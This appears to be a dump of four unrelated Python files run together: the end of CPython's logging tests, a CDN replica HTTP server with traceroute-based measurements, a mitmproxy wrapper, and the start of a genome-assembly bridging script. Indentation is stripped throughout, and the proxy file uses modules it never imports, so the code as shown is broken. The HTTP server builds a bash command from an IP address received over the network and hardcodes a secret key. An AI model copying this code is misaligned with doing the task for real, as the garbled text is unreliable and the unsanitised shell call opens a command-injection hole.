rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
def test_should_not_rollover(self):
# See bpo-45401. Should only ever rollover regular files
fh = logging.handlers.TimedRotatingFileHandler(
os.devnull, 'S', encoding="utf-8", backupCount=1)
time.sleep(1.1) # a little over a second ...
r = logging.makeLogRecord({'msg': 'testing - device file'})
self.assertFalse(fh.shouldRollover(r))
fh.close()
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def test_compute_files_to_delete(self):
# See bpo-46063 for background
wd = tempfile.mkdtemp(prefix='test_logging_')
self.addCleanup(shutil.rmtree, wd)
times = []
dt = datetime.datetime.now()
for i in range(10):
times.append(dt.strftime('%Y-%m-%d_%H-%M-%S'))
dt += datetime.timedelta(seconds=5)
prefixes = ('a.b', 'a.b.c', 'd.e', 'd.e.f')
files = []
rotators = []
for prefix in prefixes:
p = os.path.join(wd, '%s.log' % prefix)
rotator = logging.handlers.TimedRotatingFileHandler(p, when='s',
interval=5,
backupCount=7,
delay=True)
rotators.append(rotator)
if prefix.startswith('a.b'):
for t in times:
files.append('%s.log.%s' % (prefix, t))
else:
rotator.namer = lambda name: name.replace('.log', '') + '.log'
for t in times:
files.append('%s.%s.log' % (prefix, t))
# Create empty files
for fn in files:
p = os.path.join(wd, fn)
with open(p, 'wb') as f:
pass
# Now the checks that only the correct files are offered up for deletion
for i, prefix in enumerate(prefixes):
rotator = rotators[i]
candidates = rotator.getFilesToDelete()
self.assertEqual(len(candidates), 3)
if prefix.startswith('a.b'):
p = '%s.log.' % prefix
for c in candidates:
d, fn = os.path.split(c)
self.assertTrue(fn.startswith(p))
else:
for c in candidates:
d, fn = os.path.split(c)
self.assertTrue(fn.endswith('.log'))
self.assertTrue(fn.startswith(prefix + '.') and
fn[len(prefix) + 2].isdigit())
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
blacklist = {'logThreads', 'logMultiprocessing',
'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger',
'root', 'threading'}
support.check__all__(self, logging, blacklist=blacklist)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
def setUpModule():
cm = support.run_with_locale('LC_ALL', '')
cm.__enter__()
unittest.addModuleCleanup(cm.__exit__, None, None, None)
if __name__ == "__main__":
unittest.main()
|
httpserver.py
|
#!/usr/bin/env python3
import socket
import os
import http.client
import subprocess
import sys
import gzip
import threading
import time
import signal
PORT = -1
ORIGIN_PORT = 8080
ORIGIN_HOST = ''
SOCK = None
DNS_KEY = 'jds1D41HPQ2110D85ef92jdaf341kdfasfk123154'
'''
Will be called as follows:
./httpserver -p <port> -o <origin>
'''
def handle_kill(*args):
'''
Closes the socket upon PID kill or terminating character
:param args: None
:return: None
'''
if SOCK is not None:
SOCK.close()
def listen():
'''
Listens to request coming in from client
:return: None
'''
global SOCK
# Gets the host name
hostname = socket.gethostname()
# Gets the host IP Address
ip_addr = socket.gethostbyname(hostname)
# Creates a socket connection
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Binds socket to host IP Address and port
sock.bind((ip_addr, PORT))
# Listens on the socket connection for a request
sock.listen(10)
# collect sock in global variable so it can be closed on kill pid
SOCK = sock
# now that SOCK is socket, set handle_kill to close socket
signal.signal(signal.SIGTERM, handle_kill)
signal.signal(signal.SIGINT, handle_kill)
# gets the connection and address
while True:
connection, address = sock.accept()
# gets message from client
message = connection.recv(1024)
# parse the message to get the data
# Name of the webpage
resource = parseGET(message.decode())
# check cache for content client is asking for
# if looking for active measurements, start thread with measurements
if resource == DNS_KEY:
# create new thread so socket can continue to server requests
measure_thread = threading.Thread(target=doActiveMeasurements, args=(connection, message))
measure_thread.start()
# otherwise, serve info from connection
# no local writes, only reads, don't worry about locking
else:
serve_thread = threading.Thread(target=serveRequest, args=(connection, resource))
serve_thread.start()
def serveRequest(connection: socket, resource):
'''
Serves a request from the server to the client.
:param connection: socket object for given client
:param resource: what the client is looking for
:return: None
'''
# find the resource
split_resource = resource.split('/')
cache_return = None
if len(split_resource) > 0:
# get the file being looked for
cache_resource = split_resource[-1]
# search the cache for the given resource (without /wiki/ or any prior path)
cache_return = cacheSearch(cache_resource + '.html.gz', '/cache_zip')
# if found in cache, get that content from cache and send to client
if cache_return is not None:
# create 200 response and send back byte content to client
connection.send(get200Response(len(cache_return)) + cache_return)
else:
# otherwise connect to origin and get content from there
# sends entire resource, /wiki/<resource> or otherwise
content = connectOrigin(resource)
# if no error, return resposne from server, good or bad
if content is not None:
# send content from origin back to client
connection.send(content)
# if error with http.client - error returns None, send back manual "bad request"
else:
connection.send(getBadResponse().encode())
# close connection
connection.close()
def get200Response(size: int):
'''
Creates 200 response headers for cache hit.
:param size: size of the content
:return: headers for content request
'''
res_string = 'HTTP/1.1 200 OK\r\n'
res_string += 'Content-Length: ' + str(size) + '\r\n'
res_string += 'Content-Type: text/html; charset=UTF-8\r\n\r\n'
return res_string.encode()
def getBadResponse():
'''
Creates bad request response when error with http.client request
:return: header for bad request
'''
res_string = 'HTTP/1.1 400 BAD REQUEST\r\n\r\n'
return res_string
def parseGET(request):
'''
Parse the GET request
:param request: String HTTP GET request
:return: The resource to be found
'''
# split by spaces
request_list = request.split()
# find the resource
resource = request_list[1]
return resource
def cacheSearch(resource, cache):
'''
Search through cache to see if resource is already stored
:param cache:
:param resource: resource/file name searching for
:return: return content searching for, or return nothing
'''
# get path to the cache directory
path = os.getcwd() + cache
# get current list of files in the cache directory
dir = os.listdir(path)
# if empty directory
if (len(dir) == 0):
return None
# otherwise if cache is not empty and
# if the resource is in the cache directory
elif resource in dir:
# get entry for resource file
index = dir.index(resource)
file_dir = dir[index]
# open file, get unzipped contents, close file and return contents
f = gzip.open(os.getcwd() + '/cache_zip/' + file_dir, 'r')
contents = f.read()
f.close()
# return contents
return contents
def connectOrigin(request):
'''
Connects replica server to origin and foward client GET request
:param request: String http get request from client
:return:
'''
# try to connection to origin
try:
# connect to Origin
conn = http.client.HTTPConnection(ORIGIN_HOST, ORIGIN_PORT)
# set string to access from server
access_content = 'http://' + ORIGIN_HOST + ':' + str(ORIGIN_PORT) + request
# forward along GET request from client
conn.request('GET', access_content)
# get the response from origin
t = conn.getresponse()
# # if status is OK
if t.status == 200:
# return the string of the content to be added to the cache
content = t.read()
return get200Response(len(content)) + content
# otherwise return response provided by server
else:
return b'HTTP/1.1 ' + str(t.status).encode() + b'\n' + t.headers.__bytes__()
# otherwise return None to send back generic error response
except http.client.HTTPException:
return None
def doActiveMeasurements(connection: socket, client_ip_data: bytes):
'''
Performs active measurements on IPs given by DNS server
:param connection: connection to DNS server
:param client_ip_data: IPs to search for
:return: None
'''
# get the formatted string with IPS
info = client_ip_data.decode().split('\n')[-1]
# split IPs and place into list, removing all empty spaces
# split by '*' char
ips = list(filter(None, info.split('*')))
# create lock to add IP data concurrently
ip_data_lock = threading.Lock()
ip_data = []
# create list to track all threads
meas_threads = []
# iterate through all IPs requested by DNS server
for ip in ips:
# if empty string, ignore
if ip == '':
continue
# create a thread that probes the given IP address
meas_thread = threading.Thread(target=measureClient, args=(ip, ip_data, ip_data_lock))
meas_threads.append(meas_thread)
meas_thread.start()
# limit probes to 1 per second
time.sleep(1)
# wait for all threads to finish before sending data back
for thread in meas_threads:
thread.join()
# format data to be sent back
res_data = '--'.join(ip_data)
# encode data and send back with 200 response
res = res_data.encode()
connection.send(get200Response(len(res)) + res)
connection.close()
def measureClient(ip, ip_data, ip_data_lock: threading.Lock):
'''
Measures the RTT to the closest public server to the given client IP.
:param ip: client IP to probe
:param ip_data: holds rtts for all IPs requested by DNS server
:param ip_data_lock: lock that prevents multi-write on ip_data
:return: None
'''
# create new subporcess
process = subprocess.Popen(['/bin/bash'],
shell=True,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE)
# trace -q 1 specifies number of attempts per hop (1)
# trace -w 1 specifies time to wait for response, set to 1, if more than 1 theres a problem, try diff route
cmd = 'scamper -c "trace -q 1 -w 1" -i ' + ip + '\n'
# send command and wait for response from subprocess
out, err = process.communicate(cmd.encode())
data = out.decode()
# get all hops to destination server
lines = data.split('\n')
# work backwards from ip closest to host
i = len(lines) - 1
# denotes closest public IP to server in traceroute results
closest_ip = ''
# holds last private IP to server in traceroute results -- backup, refrain from relying on this
last_private = None
# holds information about last line checked
line_data = []
# work backwards from end of traceroute to find closest public ip too address
while i >= 0:
# get current line to evaluate
line = lines[i]
# get information about this hop
line_data = list(filter(None, line.split(' ')))
# if line data = 4, succeessful probe
if len(line_data) == 4:
# find IPv4 address fields
fields = line_data[1].split('.')
# if private or vm ip, continue searching
if fields[0] == '10' \
or (fields[0] == '172' and 16 <= int(fields[1]) <= 31) \
or (fields[0] == '172' and fields[1] == '192') \
or (fields[0] == '100' and 64 <= int(fields[1]) <= 127):
# collect private ip closest to client in case no public ips are found
if last_private is None:
last_private = line_data
i -= 1
continue
# else is public ip, use this as closest entry to un-pingable ip
else:
closest_ip = line_data[1]
break
i -= 1
# if all private ip addresses, use ping from closest private ip to client
if i < 0:
# if no private ip addresses in traceroute, no route found, cannot validate this value
# set to high number so it is not chosen
if last_private is None:
data_string = ip + '::999.99'
# otherwise, get ping for closest private ip to destination
else:
data_string = ip + '::' + last_private[2]
# lock ip_data list to write data for this client
ip_data_lock.acquire()
ip_data.append(data_string)
ip_data_lock.release()
# otherwise, public ip entry point has been found
else:
# ping the closest ip
process = subprocess.Popen(['/bin/bash'],
shell=True,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE)
cmd = 'scamper -c ping -i ' + closest_ip + '\n'
out, err = process.communicate(cmd.encode())
# decode results of ping
ping_info = out.decode()
# if no packets received, set ip to ping from traceroute - not great, but generally accurate
# based on empirical findings
if '0 packets received' in ping_info:
data_string = ip + '::' + line_data[2]
# otherwise, collect average
else:
avg_lat = ping_info.split('\n')[-2].split(' ')[3].split('/')[1]
data_string = ip + '::' + avg_lat
# lock ip_data list to write data for this client
ip_data_lock.acquire()
ip_data.append(data_string)
ip_data_lock.release()
def main():
'''
Runs the http server.
:return: None
'''
global ORIGIN_HOST
global PORT
# Receive HTTP GET request to local server from client
# gets the port and origin from command line
PORT = int(sys.argv[2])
ORIGIN_HOST = sys.argv[4]
# create the local cache directory
listen()
# run the server
main()
|
proxy.py
|
import asyncio
import threading
from abc import ABCMeta, abstractmethod
import mitmproxy.http
import mitmproxy.tcp
import mitmproxy.websocket
from mitmproxy.options import Options
from mitmproxy.proxy.config import ProxyConfig
from mitmproxy.proxy.server import ProxyServer
from mitmproxy.tools.dump import DumpMaster
class Proxy:
def __init__(self, listen_host='0.0.0.0', listen_port=8080, http2=True, **kwargs):
options = Options(listen_host=listen_host, listen_port=listen_port, http2=http2, **kwargs)
self.dump_master = DumpMaster(options, with_termlog=False, with_dumper=False)
self.dump_master.server = ProxyServer(ProxyConfig(options))
self.proxy_thread = threading.Thread(target=self._run_loop, args=(asyncio.get_event_loop(),))
def add_addon(self, addon):
self.dump_master.addons.add(addon)
def remove_addon(self):
self.dump_master.addons.remove()
def _run_loop(self, loop):
exc = None
try:
loop.run_forever()
except Exception: # pragma: no cover
exc = traceback.format_exc()
finally:
if not self.dump_master.should_exit.is_set(): # pragma: no cover
self.dump_master.shutdown()
tasks = asyncio.all_tasks(loop)
for p in tasks:
p.cancel()
loop.close()
if exc: # pragma: no cover
print(exc, file=sys.stderr)
print("mitmproxy has crashed!", file=sys.stderr)
print("Please lodge a bug report at:", file=sys.stderr)
print("\thttps://github.com/mitmproxy/mitmproxy", file=sys.stderr)
self.dump_master.addons.trigger("done")
def _run(self):
self.dump_master.start()
asyncio.ensure_future(self.dump_master.running())
def start(self):
self._run()
self.proxy_thread.start()
def stop(self):
self.dump_master.shutdown()
|
bridger.py
|
#! /usr/bin/python
import sys, os
import paramsparser
import PAFutils
import math
import random
import time
from datetime import datetime
# To enable importing from samscripts submodule
SCRIPT_PATH = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(SCRIPT_PATH, 'samscripts/src'))
# import utility_sam
from fastqparser import read_fastq
from PAFutils import load_paf
from graphs import *
import multiprocessing
SImin = .30 # Minimum sequence identity for the BRIDGING algorithm
# testing will be required to find the optimal value
# NOTE: current value is very low!
OHmax = .30 # Maximim allowed overhang percentage, relative to aligned length
MinMCPaths = 10 # Minimum number of paths generated by Monte Carlo method
HardNodeLimit = 1000 # Maximmum allowed number of nodes in a path, paths with a larger number of nodes will not be generated
SoftNodeLimit = 100 # A number of nodes in a path after which a warning will be printed
# Direction of extending a contig with reads
directionLEFT = 1
directionRIGHT = 0
def reverseDirection(direction):
if direction == directionLEFT:
return directionRIGHT
elif direction == directionRIGHT:
return directionLEFT
else:
return direction
compbase = {'A' : 'T',
'T' : 'A',
'C' : 'G',
'G' : 'C',
'N' : 'N'}
# Parameter definitions for paramparser
paramdefs = {'--version' : 0,
'-v' : 0,
'-o' : 1,
'--output' : 1,
'-t' : 1,
'--threads' : 1,
'--print-graph' : 0,
'--check-paths' : 0,
'--SImin' : 1,
'--OHmax' : 1,
'--MinMCPaths' : 1,
'--MaxNodesInPath' : 1}
# A function that loads global parameters from paramdict dictionary
def load_global_parameters(paramdict):
global SImin, OHmax, MinMCPaths, HardNodeLimit
if '--SImin' in paramdict:
SImin = float(paramdict['--SImin'][0])
if '--OHmax' in paramdict:
OHmax = float(paramdict['--OHmax'][0])
if '--MinMCPaths' in paramdict:
MinMCPaths = int(paramdict['--MinMCPaths'][0])
if '--MaxNodesInPath' in paramdict:
HardNodeLimit = int(paramdict['--MaxNodesInPath'][0])
# Function that test if an overlap (PAF line) is usable or not
# Overall, an overlap is not usable if:
# - one read contains the other - returns -1
# - length of aligned part is to short compared to overhangs - returns -2
# - mapping quality is too low - returns -3
# If the read is usable, the function returns 1
def test_overlap(pafline, reads_to_discard, test_contained_reads = True, test_short_length = True, test_low_quality = True):
# Fixing PAF line attributes so that they are strain independent
# KK: I think this is not correct!!
# if pafline['STRAND'] == '-':
# tstart = pafline['TSTART']
# tend = pafline['TEND']
# tlen = pafline['TLEN']
# new_tstart = tlen - tend
# new_tend = tlen - tstart
# pafline['TSTART'] = new_tstart
# pafline['TEND'] = new_tend
QOH1 = pafline['QSTART'] # Query left overhang
QOH2 = pafline['QLEN'] - pafline['QEND'] # Query right overhang
TOH1 = pafline['TSTART'] # Target left overhang
TOH2 = pafline['TLEN'] - pafline['TEND'] # Target right overhang
# KK: Fixing derived target attributes so that they are strain independent
# If Query and target are on a different strand, target overhang values have to be switched
if pafline['STRAND'] == '-':
TOH1 = pafline['TLEN'] - pafline['TEND']
TOH2 = pafline['TSTART']
QOL = pafline['QEND'] - pafline['QSTART'] + 1 # Query overlap length
TOL = pafline['TEND'] - pafline['TSTART'] + 1 # Target overlap length
SI = float(pafline['NRM']) / pafline['ABL'] # Sequence identity
# TODO: check if this is correctly calculated
# PAF fil might not give us completely correct information
avg_ovl_len = (QOL + TOL)/2
OS = avg_ovl_len * SI # Overlap score
QES1 = OS + TOH1/2 - (QOH1 + TOH2)/2 # Extension score for extending Query with Target to the left
QES2 = OS + TOH2/2 - (QOH2 + TOH1)/2 # Extension score for extending Query with Target to the right
TES1 = OS + QOH1/2 - (QOH2 + TOH1)/2 # Extension score for extending Target with Query to the left
TES2 = OS + QOH2/2 - (QOH1 + TOH2)/2 # Extension score for extending Target with Query to the right
# KK: Fixing derived target attributes so that they are strain independent
# If Query and target are on a different strand, target target extension scores should be switched
# Because the point of view is from Target perspective
if pafline['STRAND'] == '-':
TES2 = OS + QOH1/2 - (QOH2 + TOH1)/2 # Extension score for extending Target with Query to the left
TES1 = OS + QOH2/2 - (QOH1 + TOH2)/2 # Extension score for extending Target with Query to the right
# NOTE: This seeme logical:
# If a query extends further right or left then the target, it makes no sense to extend it in that direction
# Therefore setting a corresponding extension score to 0, I need to be mindful of relative strand
if QOH1 >= TOH1:
QES1 = 0
else:
if pafline['STRAND'] == '+':
TES1 = 0
else:
TES2 = 0
if QOH2 >= TOH2:
QES2 = 0
else:
if pafline['STRAND'] == '+':
TES2 = 0
else:
TES1 = 0
minQOH = QOH1 if QOH1 < QOH2 else QOH2 # Smaller query overhang, will be used to determine if the overlap is discarded
minTOH = TOH1 if TOH1 < TOH2 else TOH2 # Smaller target overhang, will be used to determine if the overlap is discarded
minOH1 = QOH1 if QOH1 < TOH1 else TOH1 # Smaller left overhang
minOH2 = QOH2 if QOH2 < TOH2 else TOH2 # Smaller right overhang
# Test for too short aligned length
# In this case the overlap is discarded, but both reads are kept
# if test_short_length:
# if float(minQOH + minTOH)/avg_ovl_len > OHmax:
# return -2
# New test for short overlaps
if test_short_length:
if float(minOH1 + minOH2)/avg_ovl_len > OHmax:
return -2
# Test for contained reads
# Has to come after test for short aligned length, if the overlap is of too short a length
# Its probably a false overlap
if test_contained_reads:
if QOH1 >= TOH1 and QOH2 >= TOH2:
# Target is contained within the query
# Discarding the overlap and target read
tname = pafline['TNAME']
reads_to_discard[tname] = 1
return -1
if TOH1 >= QOH1 and TOH2 >= QOH2:
# Query is contained within the target
# Discarding the overlap and query read
qname = pafline['QNAME']
reads_to_discard[qname] = 1
return -1
# Test for low quality overlap
if test_low_quality:
if SI < SImin:
return -3
# If there are some overlaps with zero extension score on both ends, discard those as well
if QES1 <= 0 and QES2 <= 0 and TES1 <= 0 and TES2 <= 0:
return -4
# If the overlap is correct, write relevant info to the pafline dictionary and return 1
pafline['SI'] = SI
pafline['OS'] = OS
pafline['QES1'] = QES1
pafline['QES2'] = QES2
pafline['TES1'] = TES1
pafline['TES2'] = TES2
return 1
# Check paths for consistency, to see if consecutive edges are realy connected by a node
def check_path_consistency(path):
# Empty path is consistent
if len(path) == 0:
return True
prevENode = path[0].endNode
for edge in path[1:]:
sNode = edge.startNode
if sNode != prevENode: # Is current start node equal to the previous end node?
return False
prevENode = edge.endNode # Prepare for the next step
return True
# Checking paths, to see if any contain duplicate reads!
def check_path(path):
used_nodes = {}
if len(path) == 0:
sys.stderr.write('\nERROR: empty path!')
return False
path_snode = path[0].startNode.name
path_enode = path[-1].endNode.name
used_nodes[path[0].startNode.name] = 1
for edge in path:
enode = edge.endNode.name
if enode in used_nodes:
sys.stderr.write('\nERROR: duplicate read %s in path (%s, %s)' % (enode, path_snode, path_enode))
return False
else:
used_nodes[enode] = 1
return True
def load_anchornodes(contigs_file, output=True):
[cheaders, cseqs, cquals] = load_fast(contigs_file, output)
anchornodes = {}
# Adding contigs as anchor nodes
for i in xrange(len(cheaders)):
header = cheaders[i]
idx = header.find(' ') # Removing everything from header, after the first space
if idx > -1:
header = header[:idx]
seq = cseqs[i]
qual = cquals[i]
node = AnchorNode(header, seq, qual)
anchornodes[header] = node
return anchornodes
def load_readnodes(reads_file, output=True):
[rheaders, rseqs, rquals] = load_fast(reads_file, output)
readnodes = {}
# Adding reads as read nodes
for i in xrange(len(rheaders)):
header = rheaders[i]
idx = header.find(' ') # Removing everything from header, after the first space
if idx > -1:
header = header[:idx]
seq = rseqs[i]
qual = rquals[i]
node = ReadNode(header, seq, qual)
readnodes[header] = node
return readnodes
def load_cr_overlaps(cr_overlaps_file, anchornodes, readnodes, reads_to_discard, output=True):
crovledges = [] # Edges representing overlaps between reads and contigs
cr_paf_lines = load_paf(cr_overlaps_file, output)
ncontained = nshort = nlowqual = nusable = nzeroes = 0
for pafline in cr_paf_lines:
qcontig = True # Is PAF query a contig? If false, PAF target is contig
rnode = anode = None
qname = pafline['QNAME']
tname = pafline['TNAME']
if qname in anchornodes:
anode = anchornodes[qname]
elif qname in readnodes:
rnode = readnodes[qname]
else:
sys.stderr.write('\nERROR CROVL: QNAME from PAF (%s) doesn\'t exist in reads or contigs!' % qname)
if tname in anchornodes:
anode = anchornodes[tname]
qcontig = False
elif tname in readnodes:
rnode = readnodes[tname]
else:
sys.stderr.write('\nERROR CROVL: TNAME from PAF (%s) doesn\'t exist in reads or contigs!' % tname)
# retval = test_overlap(pafline, reads_to_discard, test_contained_reads = False)
retval = test_overlap(pafline, reads_to_discard)
if retval == 1:
nusable += 1
startNode = endNode = None
if qcontig:
startNode = anode
endNode = rnode
else:
startNode = rnode
endNode = anode
edge1 = OvlEdge(pafline)
edge2 = OvlEdge(pafline, reverse=True)
edge1.startNode = startNode
edge1.endNode = endNode
startNode.outEdges.append(edge1)
edge2.startNode = endNode
edge2.endNode = startNode
endNode.outEdges.append(edge2)
crovledges.append(edge1)
crovledges.append(edge2)
elif retval == -1:
ncontained += 1
elif retval == -2:
nshort += 1
elif retval == -3:
nlowqual += 1
elif retval == -4:
nzeroes += 1
else:
sys.stderr.write('\nERROR: unknown return value by test_overlap()!')
isolated_anodes = {}
for aname, anode in anchornodes.iteritems():
if len(anode.outEdges) == 0:
isolated_anodes[aname] = anode
# for aname in isolated_anodes:
# del anchornodes[aname]
if output == True:
sys.stdout.write('\nProcessing overlaps between contigs and reads!')
sys.stdout.write('\nNumber of overlaps: %d' % len(cr_paf_lines))
sys.stdout.write('\nUsable: %d' % nusable)
sys.stdout.write('\nContained: %d' % ncontained)
sys.stdout.write('\nShort: %d' % nshort)
sys.stdout.write('\nLow quality: %d' % nlowqual)
sys.stdout.write('\nZero ES: %d' % nzeroes)
sys.stdout.write('\n')
return crovledges, isolated_anodes
# Load read/read overlaps in a signle thread
def load_rr_overlaps_ST(rr_overlaps_file, readnodes, reads_to_discard, output=True):
rrovledges = [] # Edges representing overlaps between reads and reads
nselfovl = 0
rr_paf_lines = load_paf(rr_overlaps_file, output)
dummy_reads_to_discard = {} # When checking overlaps between reads, only discarding overlaps
# and not the actual reads
ncontained = nshort = nlowqual = nusable = 0
for pafline in rr_paf_lines:
rnode1 = rnode2 = None
qname = pafline['QNAME']
tname = pafline['TNAME']
if qname in readnodes:
rnode1 = readnodes[qname]
else:
sys.stderr.write('\nERROR RROVL: QNAME from PAF (%s) doesn\'t exist in reads!' % qname)
if tname in readnodes:
rnode2 = readnodes[tname]
else:
sys.stderr.write('\nERROR RROVL: TNAME from PAF (%s) doesn\'t exist in reads!' % tname)
# Discard self-overlaps
if qname == tname:
nselfovl += 1
continue
# retval = test_overlap(pafline, reads_to_discard, test_contained_reads=False, test_short_length=False)
retval = test_overlap(pafline, dummy_reads_to_discard)
if retval == 1:
nusable += 1
edge1 = OvlEdge(pafline)
edge2 = OvlEdge(pafline, reverse=True)
edge1.startNode = rnode1
edge1.endNode = rnode2
rnode1.outEdges.append(edge1)
edge2.startNode = rnode2
edge2.endNode = rnode1
rnode2.outEdges.append(edge2)
rrovledges.append(edge1)
rrovledges.append(edge2)
elif retval == -1:
ncontained += 1
elif retval == -2:
nshort += 1
elif retval == -3:
nlowqual += 1
else:
sys.stderr.write('\nERROR: unknown return value by test_overlap()!')
if output == True:
sys.stdout.write('\nProcessing overlaps between reads and reads!')
sys.stdout.write('\nNumber of overlaps: %d' % len(rr_paf_lines))
sys.stdout.write('\nSelf overlaps: %d' % nselfovl)
sys.stdout.write('\nUsable: %d' % nusable)
sys.stdout.write('\nContained: %d' % ncontained)
sys.stdout.write('\nShort: %d' % nshort)
